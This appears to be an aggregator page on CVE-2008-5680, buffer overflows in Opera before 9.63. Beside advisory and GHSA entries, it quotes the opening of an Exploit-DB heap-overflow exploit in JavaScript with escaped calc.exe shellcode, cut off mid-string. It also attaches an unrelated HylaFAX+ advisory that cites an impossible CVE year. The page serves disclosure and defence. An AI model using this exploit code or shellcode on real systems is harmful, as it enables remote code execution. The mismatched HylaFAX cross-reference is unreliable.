CVE-2008-5680
published 2008-12-19CVE-2008-5680: Multiple buffer overflows in Opera before 9.63 might allow (1) remote attackers to execute arbitrary code via a crafted text area, or allow (2) user-assisted…
PriorityP348critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
7.51%
93.7th percentile
Multiple buffer overflows in Opera before 9.63 might allow (1) remote attackers to execute arbitrary code via a crafted text area, or allow (2) user-assisted remote attackers to execute arbitrary code via a long host name in a file: URL. NOTE: this might overlap CVE-2008-5178.
Affected
74 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| opera | opera | — | — |
| opera | opera_browser | <= 9.62 | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-pmv4-h8p5-cgxp: Heap-based buffer overflow in Opera 9
ghsa_unreviewed·2022-05-17·CVSS 9.3
CVE-2008-5178 [CRITICAL] CWE-119 GHSA-pmv4-h8p5-cgxp: Heap-based buffer overflow in Opera 9
Heap-based buffer overflow in Opera 9.62 on Windows allows remote attackers to execute arbitrary code via a long file:// URI. NOTE: this might overlap CVE-2008-5680.
GHSA
GHSA-prg5-357m-6gr2: Multiple buffer overflows in Opera before 9
ghsa_unreviewed·2022-05-14·CVSS 9.3
CVE-2008-5680 [CRITICAL] CWE-119 GHSA-prg5-357m-6gr2: Multiple buffer overflows in Opera before 9
Multiple buffer overflows in Opera before 9.63 might allow (1) remote attackers to execute arbitrary code via a crafted text area, or allow (2) user-assisted remote attackers to execute arbitrary code via a long host name in a file: URL. NOTE: this might overlap CVE-2008-5178.
No detection rules found.
Exploit-DB
HylaFAX+ 5.2.4 > 5.5.3 - Buffer Overflow
exploitdb·2013-10-02
CVE-2013-5680 HylaFAX+ 5.2.4 > 5.5.3 - Buffer Overflow
HylaFAX+ 5.2.4 > 5.5.3 - Buffer Overflow
---
Details
Application: "HylaFAX+"
Version: 5.2.4 (April, 2008) through 5.5.3 (August 6, 2013)
Type: Daemon that manages a fax server via an FTP-like protocol.
Vendor / Maintainer: Lee Howard (faxguy _at_ howardsilvan.com)
Project Homepage: http://hylafax.sourceforge.net/
Vulnerability: CWE-120: Classic buffer overflow from unchecked network
traffic, resulting in heap corruption.
Vulnerability Discoverer: Dennis Jenkins (dennis.jenkins.75 _at_ gmail.com)
CVE reference: CVE-2130-5680, 2013-09-03
Solution Status: Fixed by vendor.
Description
"HylaFAX™ is an enterprise-class open-source system for sending and
receiving facsimiles as well as for sending alpha-numeric pages."
Vulnerability
HylaFAX+ contains a daemon, "hfaxd", that allows a "fax cl
Exploit-DB
Opera 9.62 - 'file://' Local Heap Overflow
exploitdb·2008-11-17
CVE-2008-5680 Opera 9.62 - 'file://' Local Heap Overflow
Opera 9.62 - 'file://' Local Heap Overflow
---
uh?
// k`sOSe 11/15/2008
// tested on Windows XP SP3, opera 9.62 international version
// vulnerability found by send9
// there are many ways to achieve code execution, tons of function pointers to overwrite.
// maybe there's one more reliable...
var i=0;
// push es, pop es
var block = unescape("%u0607%u0607");
// metasploit WinExec c:\WINDOWS\system32\calc.exe
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49
No writeups or analysis indexed.
http://secunia.com/advisories/34294http://security.gentoo.org/glsa/glsa-200903-30.xmlhttp://securitytracker.com/id?1021457http://www.opera.com/docs/changelogs/linux/963/http://www.opera.com/support/kb/view/920/http://www.opera.com/support/kb/view/922/http://www.securityfocus.com/archive/1/498452/100/0/threadedhttp://www.securityfocus.com/archive/1/498481/100/0/threadedhttp://www.securityfocus.com/archive/1/498499/100/0/threadedhttp://www.securityfocus.com/archive/1/498517/100/0/threadedhttp://www.securityfocus.com/archive/1/498543/100/0/threadedhttp://www.securitytracker.com/id?1021456http://secunia.com/advisories/34294http://security.gentoo.org/glsa/glsa-200903-30.xmlhttp://securitytracker.com/id?1021457http://www.opera.com/docs/changelogs/linux/963/http://www.opera.com/support/kb/view/920/http://www.opera.com/support/kb/view/922/http://www.securityfocus.com/archive/1/498452/100/0/threadedhttp://www.securityfocus.com/archive/1/498481/100/0/threadedhttp://www.securityfocus.com/archive/1/498499/100/0/threadedhttp://www.securityfocus.com/archive/1/498517/100/0/threadedhttp://www.securityfocus.com/archive/1/498543/100/0/threadedhttp://www.securitytracker.com/id?1021456
2008-12-19
Published